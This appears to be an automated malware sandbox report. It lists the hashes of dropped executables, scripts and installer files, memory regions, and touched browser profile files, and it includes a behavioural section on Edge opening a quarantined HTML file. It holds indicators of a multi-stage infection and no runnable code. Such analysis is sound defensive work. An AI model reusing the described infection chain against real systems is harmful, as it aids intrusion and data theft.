SHA512 b0311f05f312f5e0d5fd6dba02d6a01f9919e618515ab31c93e61d825ba1a5dd1c2bb5ed0ea29ba250c73bcbe5275c6b363abc2d6dc25b40ec577d8a8bdda574

memory/2576-16-0x000000001B5B0000-0x000000001B892000-memory.dmp

memory/2576-17-0x00000000023A0000-0x00000000023A8000-memory.dmp

C:\Temp\2fJgGTIv1.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

memory/2392-45-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/2092-59-0x0000000000060000-0x000000000008C000-memory.dmp

memory/2156-70-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-78-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-81-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-80-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2156-76-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-74-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-72-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-68-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-66-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-83-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-64-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar2247.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 166a48acae6b70162b304869f1b71442
SHA1 105577de19bbcc814b8d43d92c23bc496b29416d
SHA256 16cff4dcf3e55aa80549a4578e684643d4c6f5d86cafa9ba89f0c5290cb4b52d
SHA512 f4fd29a8c287a1dcae3019606de7e3404e35c17bead485cc6c64a5d5f0702d179d8f6d79e7f701b87d4c26e2b02ef37ce7bb92f55e6497c3ddcca99600246a28

memory/2156-236-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-257-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-262-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-283-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-286-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

MD5 21cbf1c19605fa8a2dc9cd40990139ca
SHA1 a2c2c891b7f156bbf46428889cec083a4ae1b94c
SHA256 2bed46c8233ce24e911ae5264ffd59ec0932e711c2e5ba8d4171d34684d156ac
SHA512 43fe77ca93a34fdab17e508933c5476b149103320cce0abd44ea5bbe7ab91eec9990c3fce591f0ccd677b375ca74225e45d27638e5459e949cd18d78a61e3e00

memory/2156-325-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1284-328-0x0000000004350000-0x0000000004659000-memory.dmp

memory/1736-327-0x0000000001280000-0x0000000001589000-memory.dmp

memory/1284-326-0x0000000004350000-0x0000000004659000-memory.dmp

memory/2156-350-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-354-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-355-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-379-0x0000000000400000-0x0000000000429000-memory.dmp

\??\pipe\crashpad_1960_AMZBSCFYZJMEXKLM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

memory/1736-438-0x0000000001280000-0x0000000001589000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

MD5 2f78a06ed676b813f5e094010267b7aa
SHA1 9a418672d952366730a9f3e83b5edb99fc9e80c7
SHA256 b3b2da11dbc333ed093b8507bb6f2d513782505588a26cc9a3d6f9e5bb74f5f8
SHA512 2a32f04f7c8a034b539659fde4faabdef7fd2e6032785585c40f9f95253c220c86b58388a1cc79d2ad7622157d26dd23c198a62311bec3fa0227119b913c354a

memory/1768-456-0x00000000002C0000-0x000000000076A000-memory.dmp

memory/1284-454-0x0000000004350000-0x00000000047FA000-memory.dmp

memory/1284-455-0x0000000004350000-0x00000000047FA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/1284-467-0x0000000004350000-0x0000000004659000-memory.dmp

memory/2156-469-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1284-490-0x0000000004350000-0x0000000004659000-memory.dmp

memory/2156-494-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-491-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1768-515-0x00000000002C0000-0x000000000076A000-memory.dmp

memory/2156-518-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246

memory/2156-536-0x0000000000400000-0x0000000000429000-memory.dmp

memory/848-553-0x0000000000D50000-0x0000000000DAC000-memory.dmp

memory/2156-570-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1380-569-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1380-567-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1380-566-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1380-564-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1380-562-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1380-560-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1380-558-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1380-556-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2156-596-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-637-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2156-658-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56658f1d6bb099bd946721e615fe3111
SHA1 c9c7375e7b89f25d9f4366fecc68063b383d7953
SHA256 3dc4ad1a693b250b1beb9eb1dd8d50a3588a62919c2fe994e3a01055346a2021
SHA512 c704c08827ed5ae5cfe720a8e6571ff22b017d7c50f1d49b096142c9a5898c91d6ac9ba3cd55d8d0530ba074aa1cdb2e2af0bf4e3d0d2c992998eb05087d2002

memory/1284-714-0x0000000004350000-0x00000000047FA000-memory.dmp

memory/2156-769-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38c367fdc61338dfbb71c7eedadfab9a
SHA1 e23eca9aac00d19ff7129e12b13ba67c35365211
SHA256 ff6582f4e8f9e78745cc69b237a45ad2c73cad5067698b2249d6917330a5e947
SHA512 ce10b6e852ec41466bc7edf70e1bfa1304f51ec4049a931a85a2ffe617d7867a29e49d40a08093e83d2aba0f9d9d2e00e0641a1cc7324612a7f0e0a52bd908c6

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

MD5 522da810421341bcb17cbbc6c3a5b985
SHA1 400ac9b327e8b78c1d6171c95248bd527cf8adef
SHA256 4fdde450218490a8708204630aa45ab49241504d84bce8309319ab7b41f669b0
SHA512 46f49554ea5096a3fb47efa2421ef1c7b35dbec3519c28eb74bd3705a2366e54e946909c043b46477c00f2bacef6e6ffe733c613098763bf8ce56a42fbed36a2

memory/1284-804-0x0000000004A10000-0x0000000004D23000-memory.dmp

memory/2476-803-0x0000000000A90000-0x0000000000DA3000-memory.dmp

memory/1284-802-0x0000000004A10000-0x0000000004D23000-memory.dmp

\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

MD5 75728febe161947937f82f0f36ad99f8
SHA1 d2b5a4970b73e03bd877b075bac0cdb3bfc510cf
SHA256 0a88c347a294b22b6d6554b711db339bca86c568863dec7844a2badec6ef4282
SHA512 7cfdf76b959895ae44abe4171662d9c6c28dfd444030d570fea0fa4f624adf226e35d655dd89b159a1e0d08bcd97dfe899c3646d7682aacf5f2dabfbdf3d9a67

memory/2868-857-0x0000000000B30000-0x0000000000B8C000-memory.dmp

memory/1028-873-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1028-868-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1028-866-0x0000000000400000-0x000000000045E000-memory.dmp

memory/1284-876-0x0000000004A10000-0x0000000004D23000-memory.dmp

memory/2476-877-0x0000000000A90000-0x0000000000DA3000-memory.dmp

memory/1284-879-0x0000000004A10000-0x0000000004D23000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

MD5 32caa1d65fa9e190ba77fadb84c64698
SHA1 c96f77773845256728ae237f18a8cbc091aa3a59
SHA256 b5713079bc540d78a13d71edfe7387f97d771a3f30305a5b2978d77829ead3b1
SHA512 2dc5fe00b6536fc65f94baf71046bc3175eb1f5dec3969307aa5774601eb8fbfa24117e3e0adecd617ac2831c119bccb06e5b8b06b149075e06b76e921f71a60

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

MD5 e4dbe59c82ca504abea3cd2edf1d88c2
SHA1 ffbb19f3f677177d1b424c342c234f7e54e698ad
SHA256 b95f594a74bc165d43b272512ad01abf01f9e3be43af99333acb971888f56edf
SHA512 137a3e3da2467631c924117e3ed8f53a249c2efc3ddad6453ac1c28b97cd19736d8fa3d4c9af1c328658c77740991c18f8808e55c5567bd21a2c2f6be4c8e65f

memory/1552-906-0x00000000002E0000-0x00000000002E8000-memory.dmp

memory/1552-907-0x00000000052C0000-0x00000000055B0000-memory.dmp

memory/1552-908-0x0000000001190000-0x000000000121C000-memory.dmp

memory/1552-909-0x00000000004E0000-0x0000000000502000-memory.dmp

memory/1552-910-0x0000000004FD0000-0x000000000517C000-memory.dmp

memory/2476-913-0x0000000000A90000-0x0000000000DA3000-memory.dmp

memory/1664-927-0x0000000001ED0000-0x0000000001EFE000-memory.dmp

memory/1664-929-0x0000000001F10000-0x0000000001F1A000-memory.dmp

memory/1664-931-0x0000000002100000-0x000000000218C000-memory.dmp

memory/1664-933-0x0000000004E20000-0x0000000004FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

memory/2880-990-0x0000000000200000-0x0000000000218000-memory.dmp

memory/2880-989-0x0000000000200000-0x0000000000218000-memory.dmp

memory/2880-991-0x0000000003610000-0x000000000369C000-memory.dmp

memory/2880-992-0x00000000038B0000-0x0000000003A5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

MD5 5487dcc2e2a5d7e109c3fd49f37a798b
SHA1 1ad449a9ef2e12d905e456f9b56f97a3d0544282
SHA256 b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5
SHA512 ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845

memory/1836-1003-0x00000000012E0000-0x0000000001450000-memory.dmp

C:\Config.Msi\f78433a.rbs

MD5 cf15805a6336966585ca948fb216c883
SHA1 4b97374a0269b3592bacfaeb2fcc428e5f5ecded
SHA256 69de99513e387b2e5dd9727da940a49078d525fe0c1e0853b41afafc2d98e625
SHA512 571a11fb654134554a7ba67ca666c48e85d4a50259d565b868932b20137949f249144e419e853fb0ce7960409643370b7e2a205b2632902fa70f510ac9a79ba9

C:\Windows\Installer\f78433b.msi

MD5 aa58a0c608a2ec60555c011fe3788152
SHA1 39cb0cda4015b3dcc5e827a74f8f1f0b4e48cf0a
SHA256 564acb8e62d7ca9d440895bf347d8312fbfabb3d36eeacf247e115e766f499bd
SHA512 ff97035063141aa23a52c4b61c6e9585f66db2d6deed61b0a318e732790f4137af18fdf0fbd6e4648532da3f6a482046a183565cf3c0750101b13bc7d1763b77

memory/2880-1019-0x0000000000760000-0x0000000000796000-memory.dmp

memory/2880-1020-0x0000000000BB0000-0x0000000000BF1000-memory.dmp

memory/2880-1021-0x0000000004110000-0x00000000041E5000-memory.dmp

memory/352-1024-0x0000000001050000-0x00000000010E6000-memory.dmp

memory/352-1025-0x00000000005B0000-0x00000000005E6000-memory.dmp

memory/352-1026-0x0000000000B00000-0x0000000000B8C000-memory.dmp

memory/352-1027-0x000000001B610000-0x000000001B7BC000-memory.dmp

memory/352-1028-0x0000000000810000-0x0000000000828000-memory.dmp

memory/352-1029-0x0000000000830000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10033420101\7axE6Jz.exe

MD5 ab118fd9c6e1c3813ff0ec7cd8c6539f
SHA1 a03967883de5cfbe96036d13eac74bbb030903ef
SHA256 57153e88e47ac7b13751e8382e021cad96481f68bfa41510ed5b402adbecd7ad
SHA512 4b119738f8843025fe8c158c02a32c1e147fdbce41671c80ef58f1daec3f555fbe0248ed7174cfdebce0c5c987b616824288e3246953a79910a5504bf27fc297

memory/29688-1051-0x0000000000040000-0x00000000000A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

MD5 139801ec12921d4a10cade0e8bd14581
SHA1 19e4ea0a6204a9256bb2671aec86b1942d0bb63c
SHA256 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796
SHA512 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601

C:\Users\Admin\AppData\Local\Temp\10035810101\7fc0d1d799.exe

MD5 454bd2cde5257315f133cfc64bcd0351
SHA1 ccfb541cc802100b3d0bc4c4147bf0363675be2b
SHA256 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580
SHA512 da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f

C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7L5XEXOUOBQQZ110PQFQ.temp

MD5 7af6214a07dd65dbc87c6926a6059dcf
SHA1 0f7c48c558923edc3fba957c88813df5368951bc
SHA256 fa088310b072d8af764cd5037826ce4cb14aaa2fff35d36fea772a3043b9b033
SHA512 ccc9e37222356fbdec1642a38d6a38e01dafb11bbf22755fb2bf0143faccef958e4e64d96123cb20111769680a16b210db908d156c392ffa3351506250b00c0e

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

MD5 4c3d80aa96c22ae2f7b01a904aef5ba0
SHA1 5a4fe29daf45ada28b3a03a8284dcd098d935942
SHA256 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f
SHA512 a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204

memory/105500-1147-0x00000000001F0000-0x00000000006CE000-memory.dmp

memory/1284-1146-0x0000000004A90000-0x0000000004F6E000-memory.dmp

memory/1284-1148-0x0000000004A90000-0x0000000004F6E000-memory.dmp

memory/105500-1159-0x00000000069A0000-0x0000000006E7E000-memory.dmp

memory/105500-1161-0x00000000001F0000-0x00000000006CE000-memory.dmp

memory/105500-1158-0x00000000069A0000-0x0000000006E7E000-memory.dmp

memory/106220-1162-0x00000000013E0000-0x00000000018BE000-memory.dmp

memory/1284-1163-0x0000000004A90000-0x0000000004F6E000-memory.dmp

memory/1284-1164-0x0000000004A90000-0x0000000004F6E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

MD5 b5001d168ba5139846f2848c8e05a6ee
SHA1 080f353ab857f04ea65b78570bfa998d1e421ea2
SHA256 059e600a06b4b6671fa440728b932adff7d246441bf328fcc4a8e29d4df11a23
SHA512 d608f6f4ed7de73308ab7b231b343d5a832b2c0a68b0d0522d2df4c4a8cc15e12685b2ffcb8232b58b4c519979e4307179964fa4011752288f63f72090828143

memory/106220-1178-0x0000000006F40000-0x00000000073BF000-memory.dmp

memory/106220-1177-0x00000000013E0000-0x00000000018BE000-memory.dmp

memory/130148-1180-0x0000000000400000-0x000000000087F000-memory.dmp

memory/106220-1179-0x0000000006F40000-0x00000000073BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036490101\0d88a612ec.exe

MD5 9e3110a7e155297b4a8b2324c31147d2
SHA1 cffe1b51d8579cefd79a74df881ac5529555525b
SHA256 5785fdaa656a4cb5b6fd42f528be1c3326ed92696b4c6e176779a5d4d2cc883f
SHA512 9cd222acd97169febeb98990fbae502aa99aade0f9b981ba8cd88f2c7a8b22a2cfcf3909f432a8ad532fdd19d4d4eb863b890460e15792a6fa4229dc762377e3

memory/1284-1194-0x0000000004B10000-0x0000000004E14000-memory.dmp

memory/1284-1193-0x0000000004B10000-0x0000000004E14000-memory.dmp

memory/130484-1195-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/130148-1209-0x0000000000400000-0x000000000087F000-memory.dmp

memory/130484-1211-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/106220-1212-0x0000000006F40000-0x00000000073BF000-memory.dmp

memory/106220-1213-0x0000000006F40000-0x00000000073BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036500101\cb4d3138f3.exe

MD5 c0de6fd5072e5af19dc57d131b1b0138
SHA1 d8680c639b0f2bd288c61896a9dfce9f1b49bc56
SHA256 9e74ed79de88b2c8aedc0578e3c8cf96ffb908d72a641a72205de6c2a766aaa4
SHA512 60cf165679f2103c2945dcf8a3ddbeca604556c62c2f5821c1f11175aaf44c3b4896542b6c5f25f7dceb29d0959d6f71b578748111522d1fd1021758f6ae9e77

memory/1284-1224-0x0000000004B10000-0x0000000004E14000-memory.dmp

memory/1284-1226-0x0000000004B10000-0x0000000004E14000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

MD5 553d656bda8c682f6ce6154b6f716e83
SHA1 489327ddf034760449b7b1304ca4cb937e8f9a6a
SHA256 ca6fc95a52a06b42f8093bccac4277b432eeed97eb3717213fefa1dd57a713e8
SHA512 f68f055d2aab20be3ed438e93ed60adfef07f7cf8c2951a88a7dd8a7b73919f61a673db1fc498f830b3096dba2347784f2629c4028662f80e0b2a4879f008452

Analysis: behavioral19

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1504 wrote to memory of 4964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 4964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
